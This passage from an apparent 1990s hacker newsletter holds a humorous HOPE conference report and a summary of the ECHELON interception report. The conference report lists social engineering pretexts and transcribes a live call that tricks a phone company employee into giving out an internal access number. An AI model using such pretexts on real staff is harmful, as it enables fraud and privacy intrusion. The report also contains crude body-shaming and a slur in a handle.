nothing had been done to the decorative environs since the day Kennedy was shot. But kudos to Emmanuel for finding a centrally located cesspool that undoubtedly gave him one hell of a deal. I think it would be a big mistake to hold a hacker conference at the Plaza or some such snooty overly-self-indulgent denizen of the rich. Filth sort of lends credibility to an event that otherwise seeks notoriety. I didn't want to take up too much of Emmanuel's and Rop's time - they were in setup panic - so it was off to the netherworld until noon. That's when a civilized Con begins. * * * * * I dared to go outside; it was about 11AM and I was in search of the perfect New York breakfast: a greasy spoon that serves coffee as tough as tree bark and a catatonia inducing egg and bacon sandwich. Munch, munch, munch on that coffee. I'd forgotten how many beggars hang out on the corner of 33rd and 7th, all armed with the same words, "how about a handout, Winn?" How the hell do they know my name? "Whatever you give will come back to you double and triple . . . please man, I gotta eat." It is sad, but John Paul Getty I ain't. As I munched on my coffee and sipped my runny egg-sandwich I noticed that right in front of the runny-egg-sandwich place sat a Ford Econoline van. Nice van. Nice phone company van. What are they doing here? Oh, yeah, the hackers need lines and the switchboard is down. Of course, the phone company is here. But, what's that? Hello? A Hacker playing in the phone van? I recognize you! You work with Emmanuel. How? He's robbing it. Not robbing, maybe borrowing. The ersatz telephone van could have fooled anyone - even me, a color blind quasi-techno- weanie to yell "Yo! Ma Bell!" But, upon not-too-closer inspection, the TPC (The Phone Company) van was in fact a 2600 van - straight from the minds of Emmanuel and friends. Impeccable! The telephone bell in a circle logo is, in this case, connected via cable to a hacker at a keyboard. The commercial plates add an additional air of respectability to the whole image. It works. * * * * * Up to HOPE - egg sandwich and all. The keynote speech was to be provided courtesy of the Man in Blue. Scheduled for noon, things were getting off to a late start. The media (who were there in droves, eat your heart out CSI) converged on the MIB to see who and why someone of his stature would (gasp!) appear/speak at a funky-downtown hotel filled with the scourges of Cyberspace. I didn't see if Ben hugged the MIB, but I would understand if he didn't. Few people knew him or suspected what size of Jim-Carey-MASK arsenal might suddenly appear if a passive hug were accidentally interpreted as being too aggressive. The MIB is imposing and Ben too shy. The media can ask some dumb questions and write some dumb articles because they spend 12 1/2 minutes trying to understand an entire culture. Can't do that fellows! The MIB, though, knows hackers and is learning about them more and more; and since he is respectable, the media asks him about hackers. What are hackers? Why are YOU here, Mr. MIB? "Because they have a lot to offer. They are the future," the Man In Blue said over and over. Interview after interview - how time flies when you're having fun - and the lights and cameras are rolling from NBC and PIX and CNN and assorted other channels and magazines. At 12:55 chaos had not settled down to regimented disorganization and the MIB was getting antsy. After all, he was a military man and 55 minutes off schedule: Egad! Take charge. The MIB stood on a chair and hollered to the 700+ hacker phreaks in the demonstration ballroom, "Hey! It's starting. Let's go the theater and get rocking! Follow me." He leaned over to me: "Do you know where the room is?" "Sure, follow me." "Everyone follow, c'mon," yelled the MIB. "I'm going to get started in exactly three minutes," and three minutes he meant. Despite the fact that I got lost in a hallway and had hundreds of followers following my missteps and the MIB yelling at me for getting lost in a room with only two doors, we did make the main hall, and within 90 seconds he took over the podium and began speaking. "I bet you've always wanted to ask a spy a few questions. Here's your chance. But let me say that the United States intelligence community needs help and you guys are part of the solution." The MIB was impeccably dressed in his pin stripe with only traces of a Hackers 80 T-shirt leaking through his starched white dress shirt. The MIB is no less than Robert Steele, ex-CIA type spy, senior civilian in Marine Corps Intelligence and now the President of Open Source Solutions, Inc. He got these guys (and gals) going. Robert doesn't mince words and that's why as he puts it, he's "been adopted by the hackers." At his OSS conferences he has successfully juxtaposed hackers and senior KGB officials who needed full time security during their specially arranged 48 hour visa to Washington, DC. He brought Emmanuel and Rop and clan to his show and since their agendas aren't all that different, a camaraderie was formed. Robert MIB Steele believes that the current intelligence machinery is inadequate to meet the challenges of today's world. Over 80% of the classified information contained with the Byzantine bowels of the government is actually available from open sources. We need to realize that the future is more of an open book than ever before. We classify newspaper articles from Peru in the incredibly naive belief that only Pentagon spooks subscribe. We classify BBC video tapes from the UK with the inane belief that no one will watch it if it so stamped. We classify $4 Billion National Reconnaissance Office satellite generated street maps of Calle, Colombia when anyone with an IQ only slightly above a rock can get the same one from the tourist office. And that's where hackers come in. "You guys are a national resource. Too bad everyone's so scared of you." Applause from everywhere. The MIB knows how to massage a crowd. Hackers, according to Steele, and to a certain extent I agree, are the truth tellers "in a constellation of complex systems run amok and on the verge of catastrophic collapse." Hackers are the greatest sources of open source information in the world. They have the navigation skills, they have the time, and they have the motivation, Robert says. Hackers peruse the edges of technology and there is little that will stop them in their efforts. The intelligence community should take advantage of the skills and lessons that the hackers have to teach us, yet as we all know, political and social oppositions keep both sides (who are really more similar then dissimilar) from talking. "Hackers put a mirror up to the technical designers who have built the networks, and what they see, they don't like. Hackers have shown us all the chinks in the armor of a house without doors or windows. The information infrastructure is fragile and we had better do something about it now; before it's too late." Beat them at their own game, suggests Steele. Keep the doors of Cyberspace open, and sooner or later, the denizens of the black holes of information will have to sooner or late realize that the cat is out of the bag. Steele educated the Hacker crowd in a way new to them: he treated them with respect, and in turn he opened a channel of dialog that few above ground suit-types have ever envisioned. Steele works at the source. HOPE had begun and Robert had set the tone. * * * * * The day was long. Dogged by press, hackers rolled over so the reporters could tickle their stomachs on camera. Despite their public allegations that the media screws it up and never can get the story right, a camera is like a magnet. The New York Times printed an article about HOPE so off the wall I wondered if the reporter had actually been there. Nonetheless, the crowds followed the cameras, the cameras followed the crowds, and the crowds parted like the Red Sea. But these were mighty colorful crowds. We all hear of that prototypical image of the acne faced, Jolt- drinking, pepperoni downing nerdish teenager who has himself locked in the un-air-conditioned attic of his parents' half million dollar house from the time school gets out till the sun rises. Wrongo security-breath. Yeah, there's that component, but I was reminded of the '80's, the early '80's by a large percent- age of the crowd. Purple hair was present but scarce, and I swear on a stack of 2600's that Pat from Saturday Night Live was there putting everyone's hormonal guess-machines to the test. But what cannot help but capture one's attention is a 40 pin integrated circuit inserted into the shaved side skull of an otherwise clean-cut Mohawk haircut. The story goes that Chip Head went to a doctor and had a pair of small incisions placed in his skull which would hold the leads from the chip. A little dab of glue and in a few days the skin would grow back to hold the 40 pins in the natural way; God's way. There was a time that I thought ponytails were 'out' and passe, but I thought wrong. Mine got chopped off in roughly 1976 down to shoulder length which remained for another six years, but half of the HOPE audience is the reason for wide spread poverty in the hair salon industry. Nothing wrong with long, styled, inventive, outrageous hair as long as it's clean; and with barely an exception, such was the case. In New York it's not too hard to be perceived as clean, especially when you consider the frame of reference. Nothing is too weird. The energy level of HOPE was much higher than the almost lethargic (but good!) DefCon II. People move in a great hurry, perhaps to convey the sense of importance to others, or just out of frenetic hyperactivity. Hackers hunched over their keyboards - yet with a sense of urgency and purpose. Quiet yet highly animated conversations in all corners. HOPE staff endlessly pacing throughout the event with their walkie-talkies glued to their ears. Not many suit types. A handful at best, and what about the Feds? I was accosted a few times for being a Fed, but word spread: no Fed, no bust. Where were the Feds? In the lobby. The typical NYPD cop has the distinctive reputation of being overweight especially when he wearing two holsters - one for the gun and one for the Italian sausage. Perpetually portrayed as donut dunking dodo's, some New York cops' asses are referred to as the Fourth Precinct and a few actually moonlight as sofas. So rather than make a stink, (NY cops hate to make a scene) the lobby of the Hotel Filthadelphia was home to the Coffee Clutch for Cops. About a half dozen of them made their profound presence known by merely spending their day consuming mass quantities of questionable ingestibles, but that was infinitely preferable to hanging out on the 18th floor. The hackers weren't causing any trouble, the cops knew that, so why push it. Hackers don't fight, they hack. Right? After hours of running hours behind schedule, the HOPE conference was in first place for disorganized, with DefCon II not far behind. Only with 1000 people to keep happy and in the right rooms, chaos reigns sooner. The free Unix sessions and Pager session and open microphone bitch session and the unadulterated true history of 2600 kept audiences of several hundred hankering for more - hour after hour. Over by the cellular hacking demonstrations, I ran into a hacker I had written about: Julio, from the almost defunct Masters of Destruction. Julio had gone state's evidence and was prepared to testify against MoD ring leader Mark Abene (aka Phiber Optik) but once Mark pled guilty to enough crimes to satisfy the Feds, Julio was off the hook with mere probation. Good guy, sworn off of hacking. Cell phones are so much more interesting. However, while standing around with Erikb and a gaggle of Cyber Christ wanna-bes, Julio and his friend (who was the size of Texas on two legs) began a pushing match with Goggans. "You fucking narc red-neck son of a bitch." Goggans helped build the case against the MoD and didn't make a lot of friends in the process. The shoving and shouldering reminded me of slam dancing from decades past, but these kids are too young to have taken part in the social niceties of deranged high speed propulsion and revulsion on the dance floor. So it was a straight out pushing match, which found Erikb doing his bloody best to avoid. Julio and pal kept a'coming and Erikb kept avoiding. It took a dozen of us to get in the middle and see that Julio was escorted to the elevators. Julio said Corrupt, also of the MoD, was coming down to HOPE, too. Corrupt has been accused of mugging drug dealers to finance his computer escapades, and was busted along with the rest of the MoD gang. The implied threat was taken seriously, but, for whatever reason, Corrupt never showed. It is said that the majority of the hacking community distances itself from him; he's not good for the collective reputation. So much for hacker fights. All is calm. The evening sessions continued and continued with estimates of as late as 4AM being bandied about. Somewhere around 1:00AM I ran into Bootleg in the downstairs bar. Where was everybody? Not upstairs. Not in the bar. I saw a Garbage Heap in the street outside (now that's a double entendre) and then Goggans popped up from the door of the Blarney Stone, a syndicated chain of low- class Irish bars that serve fabulously thick hot sandwiches. "We're about to get thrown out." "From the Blarney Stone? That's impossible. Drunks call the phone booths home!" Fifty or so hacker/phreaks had migrated to the least likely, most anachronistic location one could imagine. A handful of drunken sots leaning over their beers on a stain encrusted wooden breeding ground for salmonella. A men's room that hasn't seen the fuzzy end of a brush for the best part of a century made Turkish toilets appear refreshingly clean. And they serve food here. I didn't look like a hacker so I asked the bartender, "Big crowd, eh?" The barrel chested beer bellied barman nonchalantly replied, "nah. Pretty usual." He cleaned a glass so thoroughly the water marks stood out plainly. "Really? This much action on a Saturday night on a dark side street so questionably safe that Manhattan's Mugger Society posts warnings?" "Yup." "So," I continued. "These hackers come here a lot?" "Sure do," he said emphatically. "Wow. I didn't know that. So this is sort of a hacker bar, you might say?" "Exactly. Every Saturday night they come in and raise a little hell." With a straight face I somehow managed to thank the confused barman for his help and for the next four hours learned that socially, hackers of today are no different than many if not most of us were in our late teens ad early twenties. We laughed and joked and so do they - but there is more computer talk. We decried the political status of our day as they do theirs, albeit they with less fervor and more resignation. The X-Generation factor: most of them give little more than a tiny shit about things they view as being totally outside their control, so why bother. Live for today. Know they enemy. Robert hung in with me intermingling and arguing and debating and learning from them, and they from us. Hackers aren't the enemy - their knowledge is - and they are not the exclusive holders of that information. Information Warfare is about capabilities, and no matter who possesses that capability, there ought to be a corresponding amount respect. Indeed, rather than adversaries, hackers could well become government allies and national security assets in an intense international cyber-conflict. In the LoD/MoD War of 1990-91, one group of hackers did help authorities. Today many hackers assist professional organizations, governments in the US and overseas - although very quietly. 'Can't be seen consorting with the enemy.' Is hacking from an Army or Navy or NATO base illegal? Damned if I know, but more than one Cyber Christ-like character makes a tidy sum providing hands-on hacking education to the brass in Europe. Where these guys went after 5AM I don't know, but I was one of the first to be back at the HOPE conference later that day; 12:30 PM Sunday. * * * * * The Nazi Hunters were out in force. "The Neo-Nazi skinheads are trying to start another Holocaust." A piercing, almost annoying voice stabbed right through the crowds. "Their racist propaganda advocates killing Jews and blacks. They have to be stopped, now." Mortechai Levy (I'll call him Morty) commanded the attention of a couple dozen hackers. Morty was a good, emotional, riveting shouter. "These cowardly bastards have set up vicious hate call lines in over 50 cities. The messages advocate burning synagogues, killing minorities and other violence. These phones have to be stopped!" The ever-present leaflet from Morty's Jewish Defense Organization asked for help from the 2600 population. "Phone freaks you must use your various assorted bag of tricks to shut these lines down. No cowardly sputterings about 'free speech' for these fascist scum." The headline invited the hacker/phreak community to: "Let's Shut Down 'Dial-A-Nazi'!!!" Morty was looking for political and technical support from a band of nowhere men and women who largely don't know where they're going much less care about an organized political response to someone elses cause. He wasn't making a lot of headway, and he must have know that he would walk right into the anarchist's bible: the 1st amendment. The battle lines had been set. Morty wanted to see the Nazis censored and hackers are absolute freedom of speechers by any measure. Even Ben sauntering over for a group hug did little to defuse the mounting tension. I couldn't help but play mediator. Morty was belligerently loud and being deafeningly intrusive which affected the on-going sessions. To tone it down some, we nudged Morty and company off to the side and occupied a corner of thread bare carpet, leaning against a boorish beige wall that had lost its better epidermis. The heated freedom of speech versus the promotion of racial genocide rancor subdued little even though we were all buns side down. I tried to get a little control of the situation. "Morty. Answer me this so we know where you're coming from. You advocate the silencing of the Nazis, right? "They're planning a new race war; they have to be stopped." "So you want them silenced. You say their phones should be stopped and that the hackers should help." "Call that number and they'll tell you that Jews and blacks should be killed and then they . . ." "Morty. OK, you want to censor the Nazis. Yes or No." "Yes." "OK, I can understand that. The question really is, and I need your help here, what is the line of censorship that you advocate. Where is your line of legal versus censored?" A few more minutes of political diatribe and then he got to the point. "Any group with a history of violence should be censored and stopped." A little imagination and suddenly the whole planet is silenced. We need a better line, please. "Hate group, Nazis, people who advocate genocide . . . they should be silenced . . . ." "So," I analyzed. "You want to establish censorship criteria based upon subjective interpretation. Whose interpretation?" My approach brought nods of approval. One has to admire Morty and his sheer audacity and tenacity and how much he strenuously and single-mindedly drives his points home. He didn't have the ideal sympathetic audience, but he wouldn't give an inch. Not an inch. A little self righteousness goes a long way; boisterous extremism grows stale. It invites punitive retorts and teasing, or in counter-culture jargon, "fucking with their heads." Morty (perhaps for justifiable reasons) was totally inflexible and thus more prone to verbal barbing. "You're just a Jewish racist. Racism in reverse," accused one jocular but definitely lower middle class hacker with an accent thicker than all of Brooklyn. Incoming Scuds! Look out! Morty went nuts and as they say, freedom of speech ends when my fists impacts upon your nose. Morty came dangerously close to crossing that line. Whoah, Morty, whoah. He's just fucking with your head. The calm-down brigade did its level best to keep these two mortals at opposite ends of the room. "You support that Neo Nazi down there; you're as bad as the rest!" Morty said. "See what I have to tolerate. I know him, we've been keeping track of him and he hangs out with the son of the Grand Wizard of Nazi Oz." The paranoid train got on the tracks. "Do you really know the Big Poo-bah of Hate?" I asked the hacker under assault and now under protective custody. "Yeah," he said candidly. "He's some dick head who hates everyone. Real jerk." "So what about you said to Morty over there?" "Just fucking with his head. He gets a little extreme." So we had in our midst the Al Sharpton of the Jewish faith. Ballsy. Since Morty takes Saturday's off by religious law, he missed the press cavalcade, but as a radical New York fixture, the media probably didn't mind too much. I was off to sessions, Morty found new audiences as they came off the elevators, and the band played on. * * * * * In my humble 40-something opinion, the best session of HOPE was the one on social engineering. The panel consisted of only Emmanuel, Supernigger (social engineer par excellence) and Cheshire Catalyst. The first bits were pretty staid dry conventional conference (ConCon) oriented, but nonetheless, not the kind of info that you expect to find William H. Murray, Executive Consultant handing out. The best social engineers make friends of their victims. Remember: you're playing a role. Think Remington Steele. Schmooze! "Hey, Jack did you get a load of the blond on Stern last night?" Justifiable anger: "Your department has caused nothing but headaches. These damn new computers/phones/technology just don't work like the old ones. Now either you help me now or I'm going all the way to Shellhorn and we'll what he says about these kinds of screwups." A contrite response is the desired effect. Butt headed bosses: "Hey, my boss is all over my butt, can you help me out?" Management hatred: "I'm sitting here at 3PM working while management is on their yachts. Can you tell me . . .?" Giveaways: "Did you know that so and so is having an affair with so and so? It's true, I swear. By the way, can you tell me how to . . ." Empathy: "I'm new, haven't been to the training course and they expect me to figure this out all by myself. It's not fair." Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah passurt. Cunu help? Ah, tanku." Good for a quick exchange and a quick good-bye. Carefully done, people want you off the phone quickly. Billsf, the almost 40 American phreak who now calls Amsterdam home was wiring up Supernigger's real live demonstration of social engineering against Sprint. A dial tone came over the PA system followed by the pulses to 411. "Directory Assistance," the operator's male voice was squeezed into a mere three kilohertz bandwidth. Suddenly, to the immense pleasure of the audience, an ear-splitting screech a thousand times louder than finger nails on a chalk board not only belched across the sound system but caused instant bleeding in the ears of the innocent but now deaf operator. . Billsf sheepishly grinned. "Just trying to wire up a mute button." Three hundred people in unison responded: "It doesn't work." No shit. While Billsf feverishly worked to regain his reputation, Supernigger explained what he was going to do. The phone companies have a service, ostensibly for internal use, called a C/NA. Sort of a reverse directory when you have the number but want to know who the number belongs to and from whence it comes. You can understand that this is not the sort of feature that the phone company wants to have in the hands of a generation of kids who are so apathetic that they don't even know they don't give a shit. Nonetheless, the access to this capability is through an 800 number and a PIN. Supernigger was going to show us how to acquire such privileged information. Live. "When you get some phone company person as dumb as a bolt on the other end, and you know a few buzz words. you convince them that it is in their best interest and that they are supposed to give you the information." "I've never done this in front of an audience before, so give me three tries," he explained to an anxiously foaming at the mouth crowd. No one took a cheap pot shot at him: tacit acceptance of his rules. Ring. Ring. "Operations. Mary." "Mary. Hi, this is Don Brewer in social engineering over at CIS, how's it going?" Defuse. "Oh, fine. I guess." "I know, I hate working Sundays. Been busy?" "Nah, no more. Pretty calm. How can I help you?" "I'm doing a verification and I got systems down. I just need the C/NA. You got it handy?" Long pause. "Sure, lemme look. Ah, it's 313.424.0900." 700 notebooks appeared out of nowhere, accompanied by the sound of 700 pens writing down a now-public phone number. "Got it. Thanks." The audience is gasping at the stunningly stupid gullibility of Mary. But quiet was essential to the mission. "Here's the PIN number while we're at it." Double gasp. She's offering the supposedly super secret and secure PIN number? Was this event legal? Had Supernigger gone over the line? "No, CIS just came up. Thanks anyway." "Sure you don't need it?" "Yeah. Thanks. Bye." Click. No need to press the issue. PIN access might be worth a close look from the next computer DA wanna-be. An instant shock wave of cacophonous approval worked its way throughout the 750 seat ballroom in less than 2 microseconds. Supernigger had just successfully set himself as a publicly ordained Cyber Christ of Social Engineering. His white robes were on the way. Almost a standing ovation lasted for the better part of a minute by everyone but the narcs in the audience. I don't know if they were telco or Feds of whatever, but I do know that they were the stupidest narcs in the city of New York. This pair of dour thirty something Republicans had sphincters so tight you could mine diamonds out of their ass. Arms defiantly and defensively crossed, they were stupid enough to sit in the third row center aisle. They never cracked a smile at some of the most entertaining performances I have seen outside of the giant sucking sound that emanates from Ross Perot's ears. Agree or disagree with hacking and phreaking, this was funny and unrehearsed ad lib material. Fools. So, for fun, I crawled over the legs of the front row and sat in the aisle, a bare eight feet from the narcs. Camera in hand I extended the 3000mm tele-photo lens which can distinguish the color of a mosquitoes underwear from a kilometer and pointed it in their exact direction. Their childhood acne scars appeared the depth of the Marianna Trench. Click, and the flash went off into their eyes, which at such a short distance should have caused instant blindness. But nothing. No reaction. Nada. Cold as ice. Rather disappointing, but now we know that almost human looking narc-bots have been perfected and are being beta tested at hacker cons. Emmanuel Goldstein is very funny. Maybe that's why Ed Markey and he get along so well. His low key voice rings of a gentler, kinder sarcasm but has a youthful charm despite that he is 30- something himself. "Sometimes you have to call back. Sometimes you have to call over and over to get what you want. You have to keep in mind that the people at the other end of the phone are generally not as intelligent as a powered down computer." He proceeded to prove the point. Ring ring, "Directory Assistance." "Hi." "Hi." "Hi." "Can I help you." "Yes." Pause. "Hello?" "Hi." "Hi." "Can I help you.: "OK." Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words. "Directory Assistance." "I need some information." "How can I help you." "Is this where I get numbers?" "What number would you like?" "Information." "This is information." "You said directory assistance." "This is." "But I need information." "What information do you need?" "For information." "This is information." "What's the number?" "For what?" "Information." "This is directory assistance." "I need the number for information." Pause. Pause. "What number do you want?" "For information." Pause. Guffaws, some stifled, some less so. Funny stuff. "Hold on please." Pause. "Supervisor. May I help you?" "Hi." "Hi." Pause. "Can I help you?" "I need the number for information." "This is directory assistance." "Hi." "Hi." "What's the number for information?" "This is information." "What about directory assistance?" "This is directory assistance." "But I need information." "This is information." "Oh, OK. What's the number for information?" Pause. "Ah 411." "That's it?" "No. 555.1212 works too." "So there's two numbers for information?" "Yes." "Which one is better?" How this audience kept its cool was beyond me. Me and my compatriots were beside ourselves. Pause. "Neither." "Then why are there two?" Pause. "I don't know." "OK. So I can use 411 or 555.1212." "That's right." "And which one should I use?" Pause. "411 is faster." Huge guffaws. Ssshhhh. Ssshhhh.. "Oh. What about the ones?" "Ones?" "The ones." "Which ones?" "The ones at the front of the number." "Oh, those ones. You don't need ones. Just 411 or 555.1212.." "My friends say they get to use ones." Big laugh. Shhhhhh. "That's only for long distance." "To where?" How does he keep a straight face? Pause. "If you wanted 914 information you'd use a one." "If I wanted to go where?" "To 914?" "Where's that?" "Westchester." "Oh, Westchester. I have friends there." Pause. "Hello?" "Yes?" "So I use ones?" "Yes. A one for the 914 area." "How?" Pause. "Put a one before the number." "Like 1914. Right?" "1914.555.1212." "All of those numbers?" "Yes." "That's three ones." "That's the area code." "I've heard about those. They confuse me." Rumbling chuckles and laughs throughout the hall. Pause. She slowly and carefully explained what an area code is to the howlingly irreverent amusement of the entire crowd except for the fool narcs. "Thanks. So I can call information and get a number?" "That's right." "And there's two numbers I can use?" "Yes." "So I got two numbers on one call?" "Yeah . . ." "Wow. Thanks. Have a nice day." * * * * * Comments heard around HOPE. Rop Gongrijjp, Hacktic: "The local phone companies use their own social engineers when they can't get their own people to tell them what they need to know." Sprint is using what they consider to be the greatest access mechanism since the guillotine. For all of us road warriors out there who are forever needing long distance voice service from the Whattownisthis, USA airport, Sprint thinks they have a better mousetrap. No more messing finger entry. No more pass-codes or PIN's. I remember at the Washington National Airport last summer I was using my Cable and Wireless long distance access card and entered the PIN and to my surprise, an automated voice came on and said, "Sorry, you entered your PIN with the wrong finger. Please try again." Sprint says they've solved this thorny cumbersome problem with a service called "The Voice Fone Card". Instead of memorizing another 64 digit long PIN, you just speak into the phone: "Hi, it's me. Give me dial tone or give me death." The voice recognition circuits masturbate for a while to determine if it's really you or not. Good idea. But according to Strat, not a good execution. Strat found that someone performing a poor imitation of his voice was enough to break through the front door with ease. Even a poor tape recording played back over a cheap cassette speaker was sufficient to get through Sprint's new whiz-banger ID system. Strat laughed that Sprint officials said in defense, "We didn't say it was secure: just convenient." Smart. Oh, so smart. * * * * * "If my generation of the late 60's and early 70's had had the same technology you guys have there never would have been an 80's." This was how I opened my portion of the author's panel. The authors panel was meant to give HOPE hackers insight into how they are perceived from the so-called outside. I think the session achieved that well, and I understand the videos will be available soon. The question of electronic transvestites on AOL came up to everyone's enjoyment, and all of us on the panel retorted with a big, "So what?" If you have cyber-sex with someone on the 'Net and enjoy it, what the hell's the difference? Uncomfortable butt shifting on chairs echoed how the largely male audience likely feels about male-male sex regardless of distance. "Imagine," I kinda said, "that is a few years you have a body suit which not only can duplicate your moves exactly, but can touch you in surprisingly private ways when your suit is connected to another. In this VR world, you select the gorgeous woman of choice to virtually occupy the other suit, and then the two of you go for it. How do you react when you discover that like Lola, 'I know what I am, and what I am is a man and so's Lola.'" Muted acknowledgment that unisex may come to mean something entirely different in the not too distant future. "Ooh, ooh, please call on me." I don't mean to be insulting, but purely for identification purposes, the woman behind the voice bordered on five foot four and four hundred pounds. Her bathtub had stretch marks. I never called on her but that didn't stop her. "I want to know what you think of how the democratization of the internet is affected by the differences between the government and the people who think that freedom of the net is the most important thing and that government is fucked but for freedom to be free you have to have the democracy behind you which means that the people and the government need to, I mean, you know, and get along but the sub culture of the hackers doesn't help the government but hackers are doing their thing which means that the democracy will not work , now I know that people are laughing and giggling (which they were in waves) but I'm serious about this and I know that I have a bad case of hypomania but the medication is working so it's not a bad as it could be. What do you think?" I leaned forward into the microphone and gave the only possible answer. "I dunno. Next." The thunderous round of applause which followed my in-depth response certainly suggested that my answer was correct. Not politically, not technically, but anarchistically. Flexibility counts. * * * * * HOPE was attended by around one thousands folks, and the Hotel Filthadelphia still stands. (Aw shucks.) My single biggest complaint was not that the schedules slipped by an hour or two or three; sessions at conferences like this keep going if the audience is into them and they are found to be educational and productive. So an hour session can run into two if the material and presentations fit the mood. In theory a boring session could find itself kama kazi'd into early melt-down if you have the monotone bean counter from hell explaining the distributed statistical means of aggregate synthetic transverse digitization in composite analogous integral fruminations. (Yeah, this audience would buy off on that in a hot minute.) But there were not any bad sessions. The single track plenary style attracted hundred of hackers for every event. Emmanuel and friends picked their panels and speakers well. When dealing with sponge-like minds who want to soak up all they can learn, even in somewhat of a party atmosphere, the response is bound to be good. My single biggest complaint was the registration nightmare. I'd rather go the DMV and stand in line there than get tagged by the seemingly infinite lines at HOPE. At DefCon early registration was encouraged and the sign up verification kept simple. For some reason I cannot thoroughly (or even partially) fathom, a two step procedure was chosen. Upon entering, and before the door narcs would let anyone in, each attendee had to be assigned a piece of red cardboard with a number on it. For the first day you could enter the 'exhibits' and auditorium without challenge. But by Day 2 one was expected to wait in line for the better part of a week, have a digital picture taken on a computer tied to a CCD camera, and then receive a legitimate HOPE photo-ID card. What a mess. I don't have to beat them up on it too bad; they know the whole scheme was rotten to the core. I waited till near the end of Day 2 when the lines were gone and the show was over. That's when I got my Photo ID card. I used the MIB's photo ID card the rest of the time. HOPE was a lot of fun and I was sorry to see it end, but as all experiences, there is a certain amount of letdown. After a great vacation, or summer camp, or a cruise, or maybe even after Woodstock, a tear welts up. Now I didn't cry that HOPE was over, but an intense 48 hours with hackers is definitely not your average computer security convention that only rolls from 9AM to Happy Hour. At a hacker conference, you snooze, you lose. You never know what is going to happen next - so much is spontaneous and unplanned - and it generally is highly educational, informative and entertaining. Computer security folks: you missed an event worth attending. You missed some very funny entertainment. You missed some fine young people dressed in some fine garb. You missed the chance to meet with your perceived 'enemy'. You missed the opportunity to get inside the heads of the generation that knows more about keyboards than Huck Finning in suburbia. You really missed something, and you should join Robert MIB Steele and I at the next hacker conference. * * * * * If only I had known. If only I had known that tornadoes had been dancing up and down 5th avenue I would have stayed at the Hotel Filthadelphia for another night. La Guardia airport was closed. Flights were up to 6 hours delayed if not out and out canceled. Thousands of stranded travelers hunkered down for the night. If only I had known. Wait, wait. Hours to wait. And then, finally, a plane ready and willing to take off and swerve and dive between thunderbolts and twisters and set me on my way home. My kids were bouncing out of the car windows when my wife picked me up at the airport somewhere in the vicinity of 1AM. "Not too late are you dear?" Sweet Southern Sarcasm from my Sweet Southern Wife. "Don't blame me," I said in all seriousness. "It was the hackers. They caused the whole thing." * * * * * Notice: This article is free, and the author encourages responsible widespread electronic distribution of the document in full, not piecemeal. No fees may be charged for its use. For hard copy print rights, please contact the author and I'll make you an offer you can't refuse. The author retains full copyrights to the contents and the term Cyber-Christ. Winn is the author of "Terminal Compromise", a novel detailing a fictionalized account of a computer war waged on the United States. After selling well as a book-store-book, Terminal Compromise was placed on the Global Network as the world's first Novel-on-the-Net Shareware and has become an underground classic. (Gopher TERMCOMP.ZIP) His new non-fiction book, "Information Warfare: Chaos on the Electronic Superhighway" is a compelling, non-technical analysis of personal privacy, economic and industrial espionage and national security. He calls for the creation of a National Information Policy, a Constitution in Cyberspace and an Electronic Bill of Rights. He may be reached at INTER.PACT, 11511 Pine St., Seminole, FL. 34642. 813-393-6600, fax 813-393-6361, E-Mail: P00506@psilink.com. # # # @HWA 42.0 IC2000, Interception Capabilities 2000 and ECHELON ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 7 May 1999. Thanks to Anonymous. http://jya.com/crypto.htm http://jya.com/ic2000-dc.htm 7 May 1999 Interception Capabilities 2000 ("IC2000") The IC2000 report on communications interception and ECHELON was approved as a working document by the Science and Technology Options Assessment Panel of the European Parliament (STOA) at their meeting in Strasbourg on 6 May 1999. Key findings of the IC2000 report � Comprehensive systems exist to access, intercept and process every important modern form of communications, with few exceptions (section 2, technical annexe); � The report provides original new documentary and other evidence about the ECHELON system and its role in the interception of communication satellites (section 3). In excess of 120 satellite based systems are currently in simultaneous operation collecting intelligence (section 2). Submarines are routinely used to access and intercept undersea communications systems. � There is wide-ranging evidence indicating that major governments are routinely utilising communications intelligence to provide commercial advantage to companies and trade. � Although "word spotting" search systems to automatically select telephone calls of intelligence interest are not thought to be effective, speaker recognition systems in effect, "voiceprints" have been developed and are deployed to recognise the speech of targeted individuals making international telephone calls; � Recent diplomatic initiatives by the United States government seeking European agreement to the "key escrow" system of cryptography masked intelligence collection requirements, forming part of a long-term program which has undermined and continues to undermine the communications privacy European companies and citizens; � Interception for legally authorised domestic interception and interception for clandestine intelligence purposes must be sharply distinguished. A clear boundary between law enforcement and "national security" interception activity is essential to the protection of human rights and fundamental freedoms. � Providing the measures called for in the 1998 Parliamentary resolution on "Transatlantic relations/ECHELON measures may be facilitated by developing an in-depth understanding of present and future Comint capabilities. Protective measures may best be focused on defeating hostile Comint activity by denying access or, where this is impractical or impossible, preventing processing of message content and associated traffic information by general use of cryptography. � In relation to the manner in which Internet browsers and other software is deliberately weakened for use by other than US citizens, consideration could be given to a countermeasure whereby, if systems with disabled cryptographic systems are sold outside the United States, they should be required to conform to an "open standard" such that third parties and other nations may provide additional applications which restore the level of security to at least that enjoyed by domestic US customers. � It should be possible to define and enforce a shared interest in implementing measures to defeat future external Sigint activities directed against European states, citizens and commercial activities. The full report with all images: http://jya.com/ic2000.zip [918K] A text-only version (with selected images): http://jya.com/ic2000-text.htm (356K) Text-only Zipped: http://jya.com/ic2000-text.zip (189K) Source: http://www.europarl.eu.int/dg4/stoa/en/news/1999/apr99.htm#workdocs STOA Newsletter April 1999 Strasbourg, 14 April 1999 PE 167.871 [Excerpt] WORKING DOCUMENTS, STUDIES, PAPERS, BRIEFS Work in Progress - The following Working documents are being presented to the STOA Panel in April: Workplan 1998 ... Development of surveillance technology and risk of abuse of economic information (Appraisal of technologies of political control) (1)The legality of the interception of electronic communications: A concise survey of the principal legal issues and instruments under international, European and national law, by Chris ELLIOTT, Surrey, UK Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April 1999, PE 168.184/part 2/4 (2)Encryption and cryptosystems in electronic surveillance: A survey of the technology assessment issues, by Franck LEPR�VOST, Technische Universit�t Berlin, Germany Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April 1999, PE 168.184/part 3/4 (3)The state of the art in Communications Intelligence (COMINT) of automated processing for intelligence purposes of intercepted broadband multi-language leased or common carrier systems, and its applicability to COMINT targeting and selection, including speech recognition, by Duncan CAMPBELL, IPTV Ltd., Edinburgh, UK Final Study, Working document for the STOA Panel, Workplan 1998 - 